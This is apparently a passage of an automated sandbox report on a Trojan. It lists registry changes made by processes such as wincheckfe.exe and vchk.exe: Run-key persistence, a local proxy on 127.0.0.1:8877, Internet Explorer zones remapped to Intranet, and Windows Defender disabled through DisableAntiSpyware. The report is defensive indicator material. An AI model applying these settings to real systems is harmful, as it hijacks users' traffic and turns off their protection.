"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process wincheckfe.exe:1024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 57 7C A9 13 59 EA 09 E5 A8 43 73 E4 1C 35 1D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process wcheckf.exe:1312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2E 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 4A 58 ED 96 56 E4 A7 86 84 B9 E3 41 9B 92 20"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process %original file name%.exe:1588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 28 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"UninstallString" = "%Program Files%\FastInternet\dotuninstall.exe"

[HKLM\SOFTWARE\dingdongde]
"dingdongde" = "ok"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"DisplayName" = "FastInternet"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 6A E5 8E 81 D9 8E F7 AC 9F D9 B2 B5 B3 CA 37"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"Publisher" = "Dotdo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"

"dutoauto" = "C:\a\wincheckfe.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cutoauto" = "C:\a\wincheckfe.exe"

"interpee" = "C:\a\internetport3.exe"

"autoauto" = "3215049.bat"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"rutoauto" = "3215049.bat"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process vchk.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 31 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 21 6C 86 C3 29 53 DB 39 20 93 6F 57 F8 DD 0D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process taskkill.exe:1268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 3B DF ED EF 24 72 C5 D8 5C C5 CD EF 03 70 40"

The process taskkill.exe:744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 8B 67 97 EB D0 9B 83 91 E6 6D 82 10 53 84 AD"

The process taskkill.exe:572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 1F D3 D3 F4 24 BF 1F 57 AE B4 D0 6B A9 73 5E"

The process taskkill.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 03 12 83 27 C4 E3 A4 9D 83 00 32 4C 86 5F 7D"

The process taskkill.exe:1200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 25 59 E9 C5 2C D4 6F 0D EF 00 9A 06 37 3D EE"

The process taskkill.exe:1920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 D4 5F 44 BA 78 82 64 22 E7 D1 55 93 10 AD A0"

The process taskkill.exe:1924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 30 F4 6B C9 31 15 64 01 74 63 CE 32 DD F0 BA"

The process taskkill.exe:232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 5D C7 F3 57 4C CE 25 6B 2D FA A7 E2 25 8E 1A"

The process taskkill.exe:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 85 2D 5B 51 55 40 9B 8D 37 16 7D 5A 38 65 ED"

The process taskkill.exe:1776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 F1 0A EA BD DF 0A 06 4F 58 69 51 7E 33 B0 1A"

The process taskkill.exe:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 36 D1 F3 BF 4C 09 D2 0C 74 D5 A2 BA 7B 02 B2"

The process taskkill.exe:1192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 00 C7 23 D1 EB A3 92 6E 5C 54 61 86 41 0E 86"

The process taskkill.exe:1584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C AB DB A6 6E D0 4F 83 99 D0 E4 EA 42 AD 63 28"

The process taskkill.exe:1252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 6C 79 D2 0C 37 ED D2 A2 7B 58 D1 35 40 01 F7"

The process taskkill.exe:1464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 02 B1 12 AE 23 B8 F1 4F C9 5D 40 4D 27 47 00"

The process taskkill.exe:2016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 89 B4 72 8D FA 73 4A 31 80 91 94 46 E1 6B F1"

The process taskkill.exe:1036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 FF 8F 15 FC 92 2F A7 12 5B 63 69 72 A4 9B C9"

The process taskkill.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 FE 7F AA 67 B6 FB 54 25 FF 3F 38 86 CE A6 D4"

The process taskkill.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 FA 07 D2 32 1D 0A 4A 89 8E D5 F9 BE B6 8F E3"

The process taskkill.exe:1216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 90 B6 8E AA 94 FA 91 F3 42 04 02 AB AC F8 F0"

The process taskkill.exe:672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 99 C1 22 AD 98 83 31 54 39 2F CB 1D FE 9F A8"

The process taskkill.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 76 52 40 C4 53 BF FC 1F 09 3A D8 3A 16 6A 04"

The process taskkill.exe:120 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 92 24 EF 84 B3 E8 4D D5 22 44 5D D2 3A 16 D9"

The process taskkill.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 63 16 7E FE 65 62 CF 88 29 04 49 CA 99 AC 86"

The process taskkill.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 2E 9A F6 E1 4F 2E 8F 48 BB C8 CC C8 68 1D CF"

The process taskkill.exe:388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 09 D8 07 35 E1 BD D7 F1 DD 0B 37 67 04 9D D1"

The process taskkill.exe:1020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 33 6C EE 1E 14 AA E1 A2 90 8B 17 F8 3B 47 8F"

The process taskkill.exe:1432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 DB 91 62 BF 33 68 B8 D5 22 ED C0 E2 97 A8 C4"

The process taskkill.exe:1280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 8C AC E4 DB E6 64 CF 1D E9 7B 4E 9E 0B 15 D2"

The process taskkill.exe:1728 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 F2 51 E9 00 76 1D FA A2 71 70 E9 5C 36 B1 EE"

The process taskkill.exe:1384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 60 FD AE 65 A7 72 3C 00 89 EF AA 6D D8 FA 38"

The process taskkill.exe:860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 BC B0 D8 55 ED 3E A7 1C 95 C5 01 FC 76 40 54"

The process taskkill.exe:908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 CA 11 26 09 72 12 24 B5 45 06 0F 30 27 62 A1"

The process taskkill.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 7A 8D 14 33 06 7D BB FD B8 B0 72 C6 29 44 74"

The process taskkill.exe:2020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 2F C8 41 44 3F 95 FF C2 8F 1C A6 D9 AA C7 DE"

The process taskkill.exe:1008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 C3 02 FE 8F EF 87 40 75 6B A9 08 6D F8 70 BC"

The process taskkill.exe:296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 66 74 96 D4 0C 05 F2 DA DB 00 C8 41 C2 A2 6A"

The process taskkill.exe:292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 9C 62 5B 1A 5A C0 BA B5 37 0C 74 B9 A7 EB B5"

The process taskkill.exe:680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 A8 3B AC C6 D2 6F B5 70 BE 64 43 49 E3 26 24"

The process taskkill.exe:1416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE D8 8F C5 31 25 2C 42 AA 46 FA 20 7D 0D 03 49"

The process getcap.exe:500 makes changes in the system registry.
